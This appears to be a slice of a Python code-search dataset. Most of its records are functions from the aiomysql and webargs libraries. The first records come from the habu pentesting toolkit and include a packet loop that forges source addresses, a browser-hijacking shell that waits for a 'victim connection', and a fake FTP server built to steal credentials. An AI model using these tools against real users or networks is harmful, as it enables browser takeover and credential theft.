maxsplit=1)[0], randint(1, 254)) if forgemac: pkt[Ether].src = RandMAC() pkt[TCP].sport = randint(10000, 65000) if verbose: print(pkt.summary()) else: print('.', end='') sys.stdout.flush() sendp(pkt) counter += 1 if count != 0 and counter == count: break return True
python
{ "resource": "" }
q29740
cmd_usercheck
train
def cmd_usercheck(username, no_cache, verbose, wopen): """Check if the given username exists on various social networks and other popular sites. \b $ habu.usercheck portantier { "aboutme": "https://about.me/portantier", "disqus": "https://disqus.com/by/portantier/", "github": "https://github.com/portantier/", "ifttt": "https://ifttt.com/p/portantier", "lastfm": "https://www.last.fm/user/portantier", "medium": "https://medium.com/@portantier", "pastebin": "https://pastebin.com/u/portantier", "pinterest": "https://in.pinterest.com/portantier/", "twitter": "https://twitter.com/portantier", "vimeo": "https://vimeo.com/portantier" } """ habucfg = loadcfg() if verbose: logging.basicConfig(level=logging.INFO, format='%(message)s') if not no_cache: homedir = pwd.getpwuid(os.getuid()).pw_dir requests_cache.install_cache(homedir + '/.habu_requests_cache') logging.info('using cache on ' + homedir + '/.habu_requests_cache') existent = {} for site, url in urls.items(): u = url.format(username) logging.info(u) try: r = requests.head(u, allow_redirects=False) except Exception: continue if r.status_code == 200: if requests.head(url.format('zei4fee3q9'), allow_redirects=False).status_code == 200: logging.error('Received status 200 for user zei4fee3q9, maybe, the check needs to be fixed') else: existent[site] = u if wopen: webbrowser.open_new_tab(u) print(json.dumps(existent, indent=4))
python
{ "resource": "" }
q29741
cmd_dhcp_discover
train
def cmd_dhcp_discover(iface, timeout, verbose): """Send a DHCP request and show what devices has replied. Note: Using '-v' you can see all the options (like DNS servers) included on the responses. \b # habu.dhcp_discover Ether / IP / UDP 192.168.0.1:bootps > 192.168.0.5:bootpc / BOOTP / DHCP """ conf.verb = False if iface: conf.iface = iface conf.checkIPaddr = False hw = get_if_raw_hwaddr(conf.iface) ether = Ether(dst="ff:ff:ff:ff:ff:ff") ip = IP(src="0.0.0.0",dst="255.255.255.255") udp = UDP(sport=68,dport=67) bootp = BOOTP(chaddr=hw) dhcp = DHCP(options=[("message-type","discover"),"end"]) dhcp_discover = ether / ip / udp / bootp / dhcp ans, unans = srp(dhcp_discover, multi=True, timeout=5) # Press CTRL-C after several seconds for _, pkt in ans: if verbose: print(pkt.show()) else: print(pkt.summary())
python
{ "resource": "" }
q29742
cmd_nmap_excluded
train
def cmd_nmap_excluded(lowest, highest): """ Prints a random port that is not present on nmap-services file so is not scanned automatically by nmap. Useful for services like SSH or RDP, that are continuously scanned on their default ports. Example: \b # habu.nmap.excluded 58567 """ if lowest >= highest: logging.error('lowest can not be greater or equal than highest') cfg = loadcfg() with (cfg['DATADIR'] / 'nmap-services').open() as nsf: nmap_services = nsf.read() unwanted = set() for line in nmap_services.strip().split('\n'): if line.startswith('#'): continue service,port,_ = line.split('\t', maxsplit=2) unwanted.add(int(port.split('/')[0])) choices = list(range(lowest,highest)) random.shuffle(choices) found = False for choice in choices: if choice not in unwanted: print(choice) found = True break if not found: logging.error('Can\'t find a port number with the specified parameters')
python
{ "resource": "" }
q29743
cmd_jshell
train
def cmd_jshell(ip, port, verbose): """Control a web browser through Websockets. Bind a port (default: 3333) and listen for HTTP connections. On connection, send a JavaScript code that opens a WebSocket that can be used to send commands to the connected browser. You can write the commands directly in the shell, or use plugins, that are simply external JavaScript files. Using habu.jshell you can completely control a web browser. Reference: https://developer.mozilla.org/en-US/docs/Web/API/WebSockets_API Example: \b $ habu.jshell >> Listening on 192.168.0.10:3333. Waiting for a victim connection. >> HTTP Request received from 192.168.0.15. Sending hookjs >> Connection from 192.168.0.15 $ _sessions 0 * 192.168.0.15:33432 Mozilla/5.0 (X11; Linux x86_64; rv:57.0) Gecko/20100101 Firefox/57.0 $ _info { "user-agent": "Mozilla/5.0 (X11; Linux x86_64; rv:57.0) Gecko/20100101 Firefox/57.0", "location": "http://192.168.0.10:3333/", "java-enabled": false, "platform": "Linux x86_64", "app-code-name": "Mozilla", "app-name": "Netscape", "app-version": "5.0 (X11)", "cookie-enabled": true, "language": "es-AR", "online": true } $ document.location http://192.168.0.10:3333/ """ global hook_js hook_js = hook_js.format(ip=ip, port=port) print('>>> Listening on {}:{}. Waiting for a victim connection.'.format(ip, port)) eventloop = asyncio.get_event_loop() eventloop.run_until_complete(websockets.serve(handler, ip, port, create_protocol=MyWebSocketServerProtocol)) thread = threading.Thread(target=eventloop.run_forever) thread.start() completer = WordCompleter(completer_list + list(runner.internal_commands) + list(runner.external_commands)) history = InMemoryHistory() while True: if not thread.is_alive(): break cmd = prompt('$ ', patch_stdout=True, completer=completer, history=history, lexer=PygmentsLexer(JavascriptLexer)) if cmd: if cmd == '_help': runner.cmd_help() elif runner.sessions: queue.put_nowait(cmd) else: print('>>> No active session!')
python
{ "resource": "" }
q29744
cmd_xor
train
def cmd_xor(k, i, o): """XOR cipher. Note: XOR is not a 'secure cipher'. If you need strong crypto you must use algorithms like AES. You can use habu.fernet for that. Example: \b $ habu.xor -k mysecretkey -i /bin/ls > xored $ habu.xor -k mysecretkey -i xored > uxored $ sha1sum /bin/ls uxored $ 6fcf930fcee1395a1c95f87dd38413e02deff4bb /bin/ls $ 6fcf930fcee1395a1c95f87dd38413e02deff4bb uxored """ o.write(xor(i.read(), k.encode()))
python
{ "resource": "" }
q29745
cmd_server_ftp
train
def cmd_server_ftp(address, port, enable_ssl, ssl_cert, ssl_key, verbose): """Basic fake FTP server, whith the only purpose to steal user credentials. Supports SSL/TLS. Example: \b # sudo habu.server.ftp --ssl --ssl-cert /tmp/cert.pem --ssl-key /tmp/key.pem Listening on port 21 Accepted connection from ('192.168.0.27', 56832) Credentials collected from 192.168.0.27! fabian 123456 """ ssl_context = None if enable_ssl: if not (ssl_cert and ssl_key): print('Please, specify --ssl-cert and --ssl-key to enable SSL/TLS') return False ssl_context = ssl.create_default_context(ssl.Purpose.CLIENT_AUTH) ssl_context.check_hostname = False ssl_context.load_cert_chain(ssl_cert, ssl_key) loop = asyncio.get_event_loop() coro = loop.create_server(ServerFTP, host=address, port=port, ssl=ssl_context, reuse_address=True, reuse_port=True) server = loop.run_until_complete(coro) drop_privileges() print('Listening on port {}'.format(port)) try: loop.run_forever() finally: server.close() loop.close()
python
{ "resource": "" }
q29746
cmd_whois_domain
train
def cmd_whois_domain(domain): """Simple whois client to check domain names. Example: \b $ habu.whois.domain portantier.com { "domain_name": "portantier.com", "registrar": "Amazon Registrar, Inc.", "whois_server": "whois.registrar.amazon.com", ... """ warnings.filterwarnings("ignore") data = whois.whois(domain) data = remove_duplicates(data) print(json.dumps(data, indent=4, default=str))
python
{ "resource": "" }
q29747
cmd_gateway_find
train
def cmd_gateway_find(network, iface, host, tcp, dport, timeout, verbose): """ Try to reach an external IP using any host has a router. Useful to find routers in your network. First, uses arping to detect alive hosts and obtain MAC addresses. Later, create a network packet and put each MAC address as destination. Last, print the devices that forwarded correctly the packets. Example: \b # habu.find.gateway 192.168.0.0/24 192.168.0.1 a4:08:f5:19:17:a4 Sagemcom 192.168.0.7 b0:98:2b:5d:22:70 Sagemcom 192.168.0.8 b0:98:2b:5d:1f:e8 Sagemcom """ if verbose: logging.basicConfig(level=logging.INFO, format='%(message)s') conf.verb = False if iface: conf.iface = iface res, unans = srp(Ether(dst="ff:ff:ff:ff:ff:ff")/ARP(pdst=network), timeout=2) neighbors = set() for _, pkt in res: neighbors.add((pkt['Ether'].src, pkt['Ether'].psrc)) for mac,ip in neighbors: if tcp: res, unans = srp(Ether(dst=mac)/IP(dst=host)/TCP(dport=dport), timeout=timeout) else: res, unans = srp(Ether(dst=mac)/IP(dst=host)/ICMP(), timeout=timeout) for _,pkt in res: if pkt: if verbose: print(pkt.show()) else: print(ip, mac, conf.manufdb._get_manuf(mac))
python
{ "resource": "" }
q29748
cmd_extract_email
train
def cmd_extract_email(infile, verbose, jsonout): """Extract email addresses from a file or stdin. Example: \b $ cat /var/log/auth.log | habu.extract.email john@securetia.com raven@acmecorp.net nmarks@fimax.com """ if verbose: logging.basicConfig(level=logging.INFO, format='%(message)s') data = infile.read() result = [] result = extract_email(data) if jsonout: print(json.dumps(result, indent=4)) else: print('\n'.join(result))
python
{ "resource": "" }
q29749
cmd_karma_bulk
train
def cmd_karma_bulk(infile, jsonout, badonly, verbose): """Show which IP addresses are inside blacklists using the Karma online service. Example: \b $ cat /var/log/auth.log | habu.extract.ipv4 | habu.karma.bulk 172.217.162.4 spamhaus_drop,alienvault_spamming 23.52.213.96 CLEAN 190.210.43.70 alienvault_malicious """ if verbose: logging.basicConfig(level=logging.INFO, format='%(message)s') data = infile.read() result = {} for ip in data.split('\n'): if ip: logging.info('Checking ' + ip) response = karma(ip) if response: result[ip] = response elif not badonly: result[ip] = ['CLEAN'] if jsonout: print(json.dumps(result, indent=4)) else: for k,v in result.items(): print(k, '\t', ','.join(v))
python
{ "resource": "" }
q29750
Pool.terminate
train
def terminate(self): """Terminate pool. Close pool with instantly closing all acquired connections also. """ self.close() for conn in list(self._used): conn.close() self._terminated.add(conn) self._used.clear()
python
{ "resource": "" }
q29751
Cursor.execute
train
async def execute(self, query, args=None): """Executes the given operation Executes the given operation substituting any markers with the given parameters. For example, getting all rows where id is 5: cursor.execute("SELECT * FROM t1 WHERE id = %s", (5,)) :param query: ``str`` sql statement :param args: ``tuple`` or ``list`` of arguments for sql query :returns: ``int``, number of rows that has been produced of affected """ conn = self._get_db() while (await self.nextset()): pass if args is not None: query = query % self._escape_args(args, conn) await self._query(query) self._executed = query if self._echo: logger.info(query) logger.info("%r", args) return self._rowcount
python
{ "resource": "" }
q29752
Cursor.executemany
train
async def executemany(self, query, args): """Execute the given operation multiple times The executemany() method will execute the operation iterating over the list of parameters in seq_params. Example: Inserting 3 new employees and their phone number data = [ ('Jane','555-001'), ('Joe', '555-001'), ('John', '555-003') ] stmt = "INSERT INTO employees (name, phone) VALUES ('%s','%s')" await cursor.executemany(stmt, data) INSERT or REPLACE statements are optimized by batching the data, that is using the MySQL multiple rows syntax. :param query: `str`, sql statement :param args: ``tuple`` or ``list`` of arguments for sql query """ if not args: return if self._echo: logger.info("CALL %s", query) logger.info("%r", args) m = RE_INSERT_VALUES.match(query) if m: q_prefix = m.group(1) q_values = m.group(2).rstrip() q_postfix = m.group(3) or '' assert q_values[0] == '(' and q_values[-1] == ')' return (await self._do_execute_many( q_prefix, q_values, q_postfix, args, self.max_stmt_length, self._get_db().encoding)) else: rows = 0 for arg in args: await self.execute(query, arg) rows += self._rowcount self._rowcount = rows return self._rowcount
python
{ "resource": "" }
q29753
SSCursor.fetchall
train
async def fetchall(self): """Fetch all, as per MySQLdb. Pretty useless for large queries, as it is buffered. """ rows = [] while True: row = await self.fetchone() if row is None: break rows.append(row) return rows
python
{ "resource": "" }
q29754
Connection.close
train
def close(self): """Close socket connection""" if self._writer: self._writer.transport.close() self._writer = None self._reader = None
python
{ "resource": "" }
q29755
Connection.ensure_closed
train
async def ensure_closed(self): """Send quit command and then close socket connection""" if self._writer is None: # connection has been closed return send_data = struct.pack('<i', 1) + int2byte(COMMAND.COM_QUIT) self._writer.write(send_data) await self._writer.drain() self.close()
python
{ "resource": "" }
q29756
Connection.cursor
train
def cursor(self, *cursors): """Instantiates and returns a cursor By default, :class:`Cursor` is returned. It is possible to also give a custom cursor through the cursor_class parameter, but it needs to be a subclass of :class:`Cursor` :param cursor: custom cursor class. :returns: instance of cursor, by default :class:`Cursor` :raises TypeError: cursor_class is not a subclass of Cursor. """ self._ensure_alive() self._last_usage = self._loop.time() try: if cursors and \ any(not issubclass(cursor, Cursor) for cursor in cursors): raise TypeError('Custom cursor must be subclass of Cursor') except TypeError: raise TypeError('Custom cursor must be subclass of Cursor') if cursors and len(cursors) == 1: cur = cursors[0](self, self._echo) elif cursors: cursor_name = ''.join(map(lambda x: x.__name__, cursors)) \ .replace('Cursor', '') + 'Cursor' cursor_class = type(cursor_name, cursors, {}) cur = cursor_class(self, self._echo) else: cur = self.cursorclass(self, self._echo) fut = self._loop.create_future() fut.set_result(cur) return _ContextManager(fut)
python
{ "resource": "" }
q29757
Connection.ping
train
async def ping(self, reconnect=True): """Check if the server is alive""" if self._writer is None and self._reader is None: if reconnect: await self._connect() reconnect = False else: raise Error("Already closed") try: await self._execute_command(COMMAND.COM_PING, "") await self._read_ok_packet() except Exception: if reconnect: await self._connect() await self.ping(False) else: raise
python
{ "resource": "" }
q29758
Connection.write_packet
train
def write_packet(self, payload): """Writes an entire "mysql packet" in its entirety to the network addings its length and sequence number. """ # Internal note: when you build packet manually and calls # _write_bytes() directly, you should set self._next_seq_id properly. data = pack_int24(len(payload)) + int2byte(self._next_seq_id) + payload self._write_bytes(data) self._next_seq_id = (self._next_seq_id + 1) % 256
python
{ "resource": "" }
q29759
MySQLResult._read_rowdata_packet
train
async def _read_rowdata_packet(self): """Read a rowdata packet for each data row in the result set.""" rows = [] while True: packet = await self.connection._read_packet() if self._check_packet_is_eof(packet): # release reference to kill cyclic reference. self.connection = None break rows.append(self._read_row_from_packet(packet)) self.affected_rows = len(rows) self.rows = tuple(rows)
python
{ "resource": "" }
q29760
MySQLResult._get_descriptions
train
async def _get_descriptions(self): """Read a column descriptor packet for each column in the result.""" self.fields = [] self.converters = [] use_unicode = self.connection.use_unicode conn_encoding = self.connection.encoding description = [] for i in range(self.field_count): field = await self.connection._read_packet( FieldDescriptorPacket) self.fields.append(field) description.append(field.description()) field_type = field.type_code if use_unicode: if field_type == FIELD_TYPE.JSON: # When SELECT from JSON column: charset = binary # When SELECT CAST(... AS JSON): charset = connection # encoding # This behavior is different from TEXT / BLOB. # We should decode result by connection encoding # regardless charsetnr. # See https://github.com/PyMySQL/PyMySQL/issues/488 encoding = conn_encoding # SELECT CAST(... AS JSON) elif field_type in TEXT_TYPES: if field.charsetnr == 63: # binary # TEXTs with charset=binary means BINARY types. encoding = None else: encoding = conn_encoding else: # Integers, Dates and Times, and other basic data # is encoded in ascii encoding = 'ascii' else: encoding = None converter = self.connection.decoders.get(field_type) if converter is through: converter = None self.converters.append((encoding, converter)) eof_packet = await self.connection._read_packet() assert eof_packet.is_eof_packet(), 'Protocol error, expecting EOF' self.description = tuple(description)
python
{ "resource": "" }
q29761
Transaction.rollback
train
async def rollback(self): """Roll back this transaction.""" if not self._parent._is_active: return await self._do_rollback() self._is_active = False
python
{ "resource": "" }
q29762
TwoPhaseTransaction.prepare
train
async def prepare(self): """Prepare this TwoPhaseTransaction. After a PREPARE, the transaction can be committed. """ if not self._parent.is_active: raise exc.InvalidRequestError("This transaction is inactive") await self._connection._prepare_twophase_impl(self._xid) self._is_prepared = True
python
{ "resource": "" }
q29763
SAConnection.execute
train
def execute(self, query, *multiparams, **params): """Executes a SQL query with optional parameters. query - a SQL query string or any sqlalchemy expression. *multiparams/**params - represent bound parameter values to be used in the execution. Typically, the format is a dictionary passed to *multiparams: await conn.execute( table.insert(), {"id":1, "value":"v1"}, ) ...or individual key/values interpreted by **params:: await conn.execute( table.insert(), id=1, value="v1" ) In the case that a plain SQL string is passed, a tuple or individual values in \*multiparams may be passed:: await conn.execute( "INSERT INTO table (id, value) VALUES (%d, %s)", (1, "v1") ) await conn.execute( "INSERT INTO table (id, value) VALUES (%s, %s)", 1, "v1" ) Returns ResultProxy instance with results of SQL query execution. """ coro = self._execute(query, *multiparams, **params) return _SAConnectionContextManager(coro)
python
{ "resource": "" }
q29764
SAConnection.scalar
train
async def scalar(self, query, *multiparams, **params): """Executes a SQL query and returns a scalar value.""" res = await self.execute(query, *multiparams, **params) return (await res.scalar())
python
{ "resource": "" }
q29765
SAConnection.begin_nested
train
async def begin_nested(self): """Begin a nested transaction and return a transaction handle. The returned object is an instance of :class:`.NestedTransaction`. Nested transactions require SAVEPOINT support in the underlying database. Any transaction in the hierarchy may .commit() and .rollback(), however the outermost transaction still controls the overall .commit() or .rollback() of the transaction of a whole. """ if self._transaction is None: self._transaction = RootTransaction(self) await self._begin_impl() else: self._transaction = NestedTransaction(self, self._transaction) self._transaction._savepoint = await self._savepoint_impl() return self._transaction
python
{ "resource": "" }
q29766
SAConnection.begin_twophase
train
async def begin_twophase(self, xid=None): """Begin a two-phase or XA transaction and return a transaction handle. The returned object is an instance of TwoPhaseTransaction, which in addition to the methods provided by Transaction, also provides a TwoPhaseTransaction.prepare() method. xid - the two phase transaction id. If not supplied, a random id will be generated. """ if self._transaction is not None: raise exc.InvalidRequestError( "Cannot start a two phase transaction when a transaction " "is already in progress.") if xid is None: xid = self._dialect.create_xid() self._transaction = TwoPhaseTransaction(self, xid) await self.execute("XA START %s", xid) return self._transaction
python
{ "resource": "" }
q29767
SAConnection.rollback_prepared
train
async def rollback_prepared(self, xid, *, is_prepared=True): """Rollback prepared twophase transaction.""" if not is_prepared: await self.execute("XA END '%s'" % xid) await self.execute("XA ROLLBACK '%s'" % xid)
python
{ "resource": "" }
q29768
SAConnection.commit_prepared
train
async def commit_prepared(self, xid, *, is_prepared=True): """Commit prepared twophase transaction.""" if not is_prepared: await self.execute("XA END '%s'" % xid) await self.execute("XA COMMIT '%s'" % xid)
python
{ "resource": "" }
q29769
SAConnection.close
train
async def close(self): """Close this SAConnection. This results in a release of the underlying database resources, that is, the underlying connection referenced internally. The underlying connection is typically restored back to the connection-holding Pool referenced by the Engine that produced this SAConnection. Any transactional state present on the underlying connection is also unconditionally released via calling Transaction.rollback() method. After .close() is called, the SAConnection is permanently in a closed state, and will allow no further operations. """ if self._connection is None: return if self._transaction is not None: await self._transaction.rollback() self._transaction = None # don't close underlying connection, it can be reused by pool # conn.close() self._engine.release(self) self._connection = None self._engine = None
python
{ "resource": "" }
q29770
ResultProxy.first
train
async def first(self): """Fetch the first row and then close the result set unconditionally. Returns None if no row is present. """ if self._metadata is None: self._non_result() try: return (await self.fetchone()) finally: await self.close()
python
{ "resource": "" }
q29771
get_value
train
def get_value(data, name, field, allow_many_nested=False): """Get a value from a dictionary. Handles ``MultiDict`` types when ``multiple=True``. If the value is not found, return `missing`. :param object data: Mapping (e.g. `dict`) or list-like instance to pull the value from. :param str name: Name of the key. :param bool multiple: Whether to handle multiple values. :param bool allow_many_nested: Whether to allow a list of nested objects (it is valid only for JSON format, so it is set to True in ``parse_json`` methods). """ missing_value = missing if allow_many_nested and isinstance(field, ma.fields.Nested) and field.many: if is_collection(data): return data if not hasattr(data, "get"): return missing_value multiple = is_multiple(field) val = data.get(name, missing_value) if multiple and val is not missing: if hasattr(data, "getlist"): return data.getlist(name) elif hasattr(data, "getall"): return data.getall(name) elif isinstance(val, (list, tuple)): return val if val is None: return None else: return [val] return val
python
{ "resource": "" }
q29772
Parser._validated_locations
train
def _validated_locations(self, locations): """Ensure that the given locations argument is valid. :raises: ValueError if a given locations includes an invalid location. """ # The set difference between the given locations and the available locations # will be the set of invalid locations valid_locations = set(self.__location_map__.keys()) given = set(locations) invalid_locations = given - valid_locations if len(invalid_locations): msg = "Invalid locations arguments: {0}".format(list(invalid_locations)) raise ValueError(msg) return locations
python
{ "resource": "" }
q29773
Parser.parse_arg
train
def parse_arg(self, name, field, req, locations=None): """Parse a single argument from a request. .. note:: This method does not perform validation on the argument. :param str name: The name of the value. :param marshmallow.fields.Field field: The marshmallow `Field` for the request parameter. :param req: The request object to parse. :param tuple locations: The locations ('json', 'querystring', etc.) where to search for the value. :return: The unvalidated argument value or `missing` if the value cannot be found on the request. """ location = field.metadata.get("location") if location: locations_to_check = self._validated_locations([location]) else: locations_to_check = self._validated_locations(locations or self.locations) for location in locations_to_check: value = self._get_value(name, field, req=req, location=location) # Found the value; validate and return it if value is not missing: return value return missing
python
{ "resource": "" }
q29774
Parser._parse_request
train
def _parse_request(self, schema, req, locations): """Return a parsed arguments dictionary for the current request.""" if schema.many: assert ( "json" in locations ), "schema.many=True is only supported for JSON location" # The ad hoc Nested field is more like a workaround or a helper, # and it servers its purpose fine. However, if somebody has a desire # to re-design the support of bulk-type arguments, go ahead. parsed = self.parse_arg( name="json", field=ma.fields.Nested(schema, many=True), req=req, locations=locations, ) if parsed is missing: parsed = [] else: argdict = schema.fields parsed = {} for argname, field_obj in iteritems(argdict): if MARSHMALLOW_VERSION_INFO[0] < 3: parsed_value = self.parse_arg(argname, field_obj, req, locations) # If load_from is specified on the field, try to parse from that key if parsed_value is missing and field_obj.load_from: parsed_value = self.parse_arg( field_obj.load_from, field_obj, req, locations ) argname = field_obj.load_from else: argname = field_obj.data_key or argname parsed_value = self.parse_arg(argname, field_obj, req, locations) if parsed_value is not missing: parsed[argname] = parsed_value return parsed
python
{ "resource": "" }
q29775
Parser._get_schema
train
def _get_schema(self, argmap, req): """Return a `marshmallow.Schema` for the given argmap and request. :param argmap: Either a `marshmallow.Schema`, `dict` of argname -> `marshmallow.fields.Field` pairs, or a callable that returns a `marshmallow.Schema` instance. :param req: The request object being parsed. :rtype: marshmallow.Schema """ if isinstance(argmap, ma.Schema): schema = argmap elif isinstance(argmap, type) and issubclass(argmap, ma.Schema): schema = argmap() elif callable(argmap): schema = argmap(req) else: schema = dict2schema(argmap, self.schema_class)() if MARSHMALLOW_VERSION_INFO[0] < 3 and not schema.strict: warnings.warn( "It is highly recommended that you set strict=True on your schema " "so that the parser's error handler will be invoked when expected.", UserWarning, ) return schema
python
{ "resource": "" }
q29776
Parser.parse
train
def parse( self, argmap, req=None, locations=None, validate=None, error_status_code=None, error_headers=None, ): """Main request parsing method. :param argmap: Either a `marshmallow.Schema`, a `dict` of argname -> `marshmallow.fields.Field` pairs, or a callable which accepts a request and returns a `marshmallow.Schema`. :param req: The request object to parse. :param tuple locations: Where on the request to search for values. Can include one or more of ``('json', 'querystring', 'form', 'headers', 'cookies', 'files')``. :param callable validate: Validation function or list of validation functions that receives the dictionary of parsed arguments. Validator either returns a boolean or raises a :exc:`ValidationError`. :param int error_status_code: Status code passed to error handler functions when a `ValidationError` is raised. :param dict error_headers: Headers passed to error handler functions when a a `ValidationError` is raised. :return: A dictionary of parsed arguments """ self.clear_cache() # in case someone used `parse_*()` req = req if req is not None else self.get_default_request() assert req is not None, "Must pass req object" data = None validators = _ensure_list_of_callables(validate) parser = self._clone() schema = self._get_schema(argmap, req) try: parsed = parser._parse_request( schema=schema, req=req, locations=locations or self.locations ) result = schema.load(parsed) data = result.data if MARSHMALLOW_VERSION_INFO[0] < 3 else result parser._validate_arguments(data, validators) except ma.exceptions.ValidationError as error: parser._on_validation_error( error, req, schema, error_status_code, error_headers ) return data
python
{ "resource": "" }
q29777
Parser.use_kwargs
train
def use_kwargs(self, *args, **kwargs): """Decorator that injects parsed arguments into a view function or method as keyword arguments. This is a shortcut to :meth:`use_args` with ``as_kwargs=True``. Example usage with Flask: :: @app.route('/echo', methods=['get', 'post']) @parser.use_kwargs({'name': fields.Str()}) def greet(name): return 'Hello ' + name Receives the same ``args`` and ``kwargs`` as :meth:`use_args`. """ kwargs["as_kwargs"] = True return self.use_args(*args, **kwargs)
python
{ "resource": "" }
q29778
Parser.handle_error
train
def handle_error( self, error, req, schema, error_status_code=None, error_headers=None ): """Called if an error occurs while parsing args. By default, just logs and raises ``error``. """ logger.error(error) raise error
python
{ "resource": "" }
q29779
parse_json_body
train
def parse_json_body(req): """Return the decoded JSON body from the request.""" content_type = req.headers.get("Content-Type") if content_type and core.is_json(content_type): try: return core.parse_json(req.body) except TypeError: pass except json.JSONDecodeError as e: if e.doc == "": return core.missing else: raise return {}
python
{ "resource": "" }
q29780
get_value
train
def get_value(d, name, field): """Handle gets from 'multidicts' made of lists It handles cases: ``{"key": [value]}`` and ``{"key": value}`` """ multiple = core.is_multiple(field) value = d.get(name, core.missing) if value is core.missing: return core.missing if multiple and value is not core.missing: return [ decode_argument(v, name) if isinstance(v, basestring) else v for v in value ] ret = value if value and isinstance(value, (list, tuple)): ret = value[0] if isinstance(ret, basestring): return decode_argument(ret, name) else: return ret
python
{ "resource": "" }
q29781
TornadoParser.handle_error
train
def handle_error(self, error, req, schema, error_status_code, error_headers): """Handles errors during parsing. Raises a `tornado.web.HTTPError` with a 400 error. """ status_code = error_status_code or self.DEFAULT_VALIDATION_STATUS if status_code == 422: reason = "Unprocessable Entity" else: reason = None raise HTTPError( status_code, log_message=str(error.messages), reason=reason, messages=error.messages, headers=error_headers, )
python
{ "resource": "" }
q29782
PyramidParser.parse_matchdict
train
def parse_matchdict(self, req, name, field): """Pull a value from the request's `matchdict`.""" return core.get_value(req.matchdict, name, field)
python
{ "resource": "" }
q29783
PyramidParser.handle_error
train
def handle_error(self, error, req, schema, error_status_code, error_headers): """Handles errors during parsing. Aborts the current HTTP request and responds with a 400 error. """ status_code = error_status_code or self.DEFAULT_VALIDATION_STATUS response = exception_response( status_code, detail=text_type(error), headers=error_headers, content_type="application/json", ) body = json.dumps(error.messages) response.body = body.encode("utf-8") if isinstance(body, text_type) else body raise response
python
{ "resource": "" }
q29784
route
train
def route(*args, response_formatter=jsonify, **kwargs): """Combines `Flask.route` and webargs parsing. Allows arguments to be specified as function annotations. An output schema can optionally be specified by a return annotation. """ def decorator(func): @app.route(*args, **kwargs) @functools.wraps(func) def wrapped_view(*a, **kw): annotations = getattr(func, "__annotations__", {}) reqargs = { name: value for name, value in annotations.items() if isinstance(value, fields.Field) and name != "return" } response_schema = annotations.get("return") parsed = parser.parse(reqargs, request) kw.update(parsed) response_data = func(*a, **kw) if response_schema: return response_formatter(response_schema.dump(response_data).data) else: return response_formatter(func(*a, **kw)) return wrapped_view return decorator
python
{ "resource": "" }
q29785
BaseRequestHandler.write_error
train
def write_error(self, status_code, **kwargs): """Write errors as JSON.""" self.set_header("Content-Type", "application/json") if "exc_info" in kwargs: etype, exc, traceback = kwargs["exc_info"] if hasattr(exc, "messages"): self.write({"errors": exc.messages}) if getattr(exc, "headers", None): for name, val in exc.headers.items(): self.set_header(name, val) self.finish()
python
{ "resource": "" }
q29786
HTTPError.to_dict
train
def to_dict(self, *args, **kwargs): """Override `falcon.HTTPError` to include error messages in responses.""" ret = super(HTTPError, self).to_dict(*args, **kwargs) if self.errors is not None: ret["errors"] = self.errors return ret
python
{ "resource": "" }
q29787
FalconParser.parse_headers
train
def parse_headers(self, req, name, field): """Pull a header value from the request.""" # Use req.get_headers rather than req.headers for performance return req.get_header(name, required=False) or core.missing
python
{ "resource": "" }
q29788
FalconParser.parse_cookies
train
def parse_cookies(self, req, name, field): """Pull a cookie value from the request.""" cookies = self._cache.get("cookies") if cookies is None: self._cache["cookies"] = cookies = req.cookies return core.get_value(cookies, name, field)
python
{ "resource": "" }
q29789
FalconParser.get_request_from_view_args
train
def get_request_from_view_args(self, view, args, kwargs): """Get request from a resource method's arguments. Assumes that request is the second argument. """ req = args[1] assert isinstance(req, falcon.Request), "Argument is not a falcon.Request" return req
python
{ "resource": "" }
q29790
FalconParser.handle_error
train
def handle_error(self, error, req, schema, error_status_code, error_headers): """Handles errors during parsing.""" status = status_map.get(error_status_code or self.DEFAULT_VALIDATION_STATUS) if status is None: raise LookupError("Status code {0} not supported".format(error_status_code)) raise HTTPError(status, errors=error.messages, headers=error_headers)
python
{ "resource": "" }
q29791
AsyncParser.parse
train
async def parse( self, argmap: ArgMap, req: Request = None, locations: typing.Iterable = None, validate: Validate = None, error_status_code: typing.Union[int, None] = None, error_headers: typing.Union[typing.Mapping[str, str], None] = None, ) -> typing.Union[typing.Mapping, None]: """Coroutine variant of `webargs.core.Parser`. Receives the same arguments as `webargs.core.Parser.parse`. """ self.clear_cache() # in case someone used `parse_*()` req = req if req is not None else self.get_default_request() assert req is not None, "Must pass req object" data = None validators = core._ensure_list_of_callables(validate) schema = self._get_schema(argmap, req) try: parsed = await self._parse_request( schema=schema, req=req, locations=locations or self.locations ) result = schema.load(parsed) data = result.data if core.MARSHMALLOW_VERSION_INFO[0] < 3 else result self._validate_arguments(data, validators) except ma.exceptions.ValidationError as error: await self._on_validation_error( error, req, schema, error_status_code, error_headers ) return data
python
{ "resource": "" }
q29792
AIOHTTPParser.parse_cookies
train
def parse_cookies(self, req: Request, name: str, field: Field) -> typing.Any: """Pull a value from the cookiejar.""" return core.get_value(req.cookies, name, field)
python
{ "resource": "" }
q29793
AIOHTTPParser.parse_match_info
train
def parse_match_info(self, req: Request, name: str, field: Field) -> typing.Any: """Pull a value from the request's ``match_info``.""" return core.get_value(req.match_info, name, field)
python
{ "resource": "" }
q29794
AIOHTTPParser.handle_error
train
def handle_error( self, error: ValidationError, req: Request, schema: Schema, error_status_code: typing.Union[int, None] = None, error_headers: typing.Union[typing.Mapping[str, str], None] = None, ) -> "typing.NoReturn": """Handle ValidationErrors and return a JSON response of error messages to the client. """ error_class = exception_map.get( error_status_code or self.DEFAULT_VALIDATION_STATUS ) if not error_class: raise LookupError("No exception for {0}".format(error_status_code)) headers = error_headers raise error_class( body=json.dumps(error.messages).encode("utf-8"), headers=headers, content_type="application/json", )
python
{ "resource": "" }
q29795
BottleParser.handle_error
train
def handle_error(self, error, req, schema, error_status_code, error_headers): """Handles errors during parsing. Aborts the current request with a 400 error. """ status_code = error_status_code or self.DEFAULT_VALIDATION_STATUS raise bottle.HTTPError( status=status_code, body=error.messages, headers=error_headers, exception=error, )
python
{ "resource": "" }
q29796
handle_request_parsing_error
train
def handle_request_parsing_error(err, req, schema, error_status_code, error_headers): """webargs error handler that uses Flask-RESTful's abort function to return a JSON error response to the client. """ abort(error_status_code, errors=err.messages)
python
{ "resource": "" }
q29797
DateAddResource.post
train
def post(self, value, addend, unit): """A date adder endpoint.""" value = value or dt.datetime.utcnow() if unit == "minutes": delta = dt.timedelta(minutes=addend) else: delta = dt.timedelta(days=addend) result = value + delta return {"result": result.isoformat()}
python
{ "resource": "" }
q29798
get_stats_daily
train
